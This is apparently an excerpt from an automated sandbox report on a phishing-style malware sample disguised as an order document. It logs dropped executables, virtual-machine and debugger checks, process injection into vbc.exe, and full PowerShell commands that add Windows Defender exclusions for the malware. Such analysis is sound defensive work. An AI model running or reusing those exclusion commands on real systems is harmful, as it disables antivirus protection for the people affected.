                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\SensorDataService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\snmptrap.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\wbengine.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\vds.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\msdtc.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\Spectrum.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AgentService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\TieringEngineService.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\Locator.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe TID: 7336 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7920 | Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7896 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 2724 | Thread sleep count: 469 > 30
Source: C:\Windows\System32\msdtc.exe TID: 2724 | Thread sleep time: -46900s >= -30000s
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe TID: 7744 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580 | Thread sleep count: 1856 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580 | Thread sleep time: -18560000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580 | Thread sleep count: 8110 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4580 | Thread sleep time: -81100000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 9_2_00F4DF57 FindFirstFileW,9_2_00F4DF57
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: Spectrum.exe, 0000001B.00000002.2622744368.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;Microsoft Hyper-V Generation Counter\
Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Deviceb
Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MicStandard USB 3.1 eXtensible Host Controller - 1.0 (Microsoft) Host Controller - %3 (Microsoft);(Standard,3.1,1.0)sk&Ven_VMware&Pro
Source: SensorDataService.exe, 00000019.00000003.1431266016.0000000000571000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000019.00000003.1430472165.0000000000571000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1443011792.0000000000643000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444167092.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444015317.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1441055520.0000000000640000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2639227237.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1644079696.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1750547017.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1658196532.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1672024294.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1520674414.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: SensorDataService.exe, 00000019.00000003.1430472165.0000000000562000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1441055520.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device.
Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 0000001B.00000002.2622744368.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Generation CounterO
Source: SensorDataService.exe, 00000019.00000003.1528720544.0000000000574000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00L
Source: snmptrap.exe, 0000001A.00000002.2614609845.0000000000448000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRRw
Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&00000097
Source: vbc.exe, 0000002A.00000002.2639214777.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SensorDataService.exe, 00000019.00000003.1430472165.0000000000562000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1441055520.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: ssh-agent.exe, 0000001C.00000002.2624160385.000000000059C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zdVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
Source: alg.exe, 0000000B.00000003.1644079696.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1750547017.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1658196532.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1672024294.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1520674414.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP.
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1426195581.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1465820251.000000000B780000.00000004.08000000.00040000.00000000.sdmp, RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1439374797.00000000060E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bhgfSFZU2YsoW1Ik80n
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 0000001B.00000002.2624489595.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 0000001B.00000002.2624489595.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 0000001B.00000003.1442834952.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00`[`[
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000065A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
                  Source: Spectrum.exe, 0000001B.00000003.1442834952.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener
                  Source: SensorDataService.exe, 00000019.00000003.1431266016.000000000055E000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1442834952.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                  Source: AppVClient.exe, 0000000F.00000003.1402614844.0000000000550000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1403223081.000000000056E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1402678846.0000000000557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineS
                  Source: Spectrum.exe, 0000001B.00000003.1444015317.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 9_2_004A95E4 rdtsc 9_2_004A95E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 42_2_00D51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00D51361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 42_2_00483594 mov eax, dword ptr fs:[00000030h] 42_2_00483594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 42_2_00D11130 mov eax, dword ptr fs:[00000030h] 42_2_00D11130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 42_2_00D53F3D mov eax, dword ptr fs:[00000030h] 42_2_00D53F3D
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 42_2_00D51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00D51361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 42_2_00D54C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_00D54C7B
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
